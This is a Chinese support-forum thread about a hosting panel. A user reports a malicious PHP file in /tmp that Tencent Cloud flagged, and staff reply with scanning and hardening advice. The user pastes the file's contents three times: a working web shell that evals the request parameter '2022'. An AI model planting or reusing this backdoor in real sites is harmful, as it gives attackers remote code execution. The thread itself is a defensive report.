宝塔用户_wimffm 发表于 2024-7-10 11:49:07

【待反馈】/tmp目录下,腾讯云检测服务器中恶意文件

为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.0.6
问题描述: 腾讯云检测服务器中恶意文件,文件路径 :/tmp/php8jTkfx
这是文件的内容:<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>
相关截图(日志、错误):

宝塔用户_wimffm 发表于 2024-7-10 11:52:11

tmp这个目录下出现了一个恶意文件,腾讯云

本帖最后由 宝塔用户_wimffm 于 2024-7-10 11:56 编辑

为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.0.6
问题描述: 腾讯云检测服务器中恶意文件,文件路径 :/tmp/php8jTkfx
这是文件的内容:<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>
相关截图(日志、错误):

运维技术阿闯 发表于 2024-7-10 14:38:31

宝塔用户_wimffm 发表于 2024-7-10 11:52
为了能快速了解并处理您的问题,请提供以下基础信息:

您好,您在面板用微步木马扫描这个两个文件看一下

宝塔用户_wimffm 发表于 2024-7-10 17:19:21

运维技术阿闯 发表于 2024-7-10 14:38
您好,您在面板用微步木马扫描这个两个文件看一下

现在扫描不了了。我把这个文件删除了

宝塔用户_wimffm 发表于 2024-7-10 17:21:23

运维技术阿闯 发表于 2024-7-10 14:38
您好,您在面板用微步木马扫描这个两个文件看一下

<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>    这个木马文件里面的内容。我想把这个文件下载下来,本地的火绒杀毒软件报毒直接给删除了

运维技术阿闯 发表于 2024-7-10 18:02:59

宝塔用户_wimffm 发表于 2024-7-10 17:21
这个木马文件里面的内容。我想把这个文件下载下来,本地的火绒杀毒软件报毒直接给删除了 ...

开启一下系统加固和防入侵和防篡改吧,防止挂马

测速网 发表于 2024-7-11 01:44:47

我也收到提醒了,但是进去又找不到这个文件。

测速网 发表于 2024-7-11 01:46:47

运维技术阿闯 发表于 2024-7-10 18:02
开启一下系统加固和防入侵和防篡改吧,防止挂马

官方技术,我也收到这个提醒了。但是进去路径又找不到这个文件。

运维技术阿闯 发表于 2024-7-15 09:30:02

测速网 发表于 2024-7-11 01:46
官方技术,我也收到这个提醒了。但是进去路径又找不到这个文件。

问一下腾讯云那边,看看是怎么回事,找不到文件

宝塔用户_wimffm 发表于 2024-7-19 14:40:58

运维技术阿闯 发表于 2024-7-15 09:30
问一下腾讯云那边,看看是怎么回事,找不到文件


这个木马又出现了

运维技术阿闯 发表于 2024-7-19 14:46:35

宝塔用户_wimffm 发表于 2024-7-19 14:40
这个木马又出现了

您好,木马在/tmp下,说明木马被拦截成功了,被拦截的文件没有到网站文件下,就遗留到了/tmp目录下.
这个就说明拦截木马成功了,

宝塔用户_wimffm 发表于 2024-7-19 14:52:06

运维技术阿闯 发表于 2024-7-19 14:46
您好,木马在/tmp下,说明木马被拦截成功了,被拦截的文件没有到网站文件下,就遗留到了/tmp目录下.
这个 ...

被拦截的木马就存放在tmp这个目录下嘛

宝塔用户_wimffm 发表于 2024-7-19 14:52:40

运维技术阿闯 发表于 2024-7-19 14:46
您好,木马在/tmp下,说明木马被拦截成功了,被拦截的文件没有到网站文件下,就遗留到了/tmp目录下.
这个 ...

那我需要做什么处理吗

运维技术阿闯 发表于 2024-7-19 14:57:02

宝塔用户_wimffm 发表于 2024-7-19 14:52
那我需要做什么处理吗

您好,是的,被拦截的就放在了tmp目录下的,这些文件对您网站没有伤害
页: [1]
查看完整版本: 【待反馈】/tmp目录下,腾讯云检测服务器中恶意文件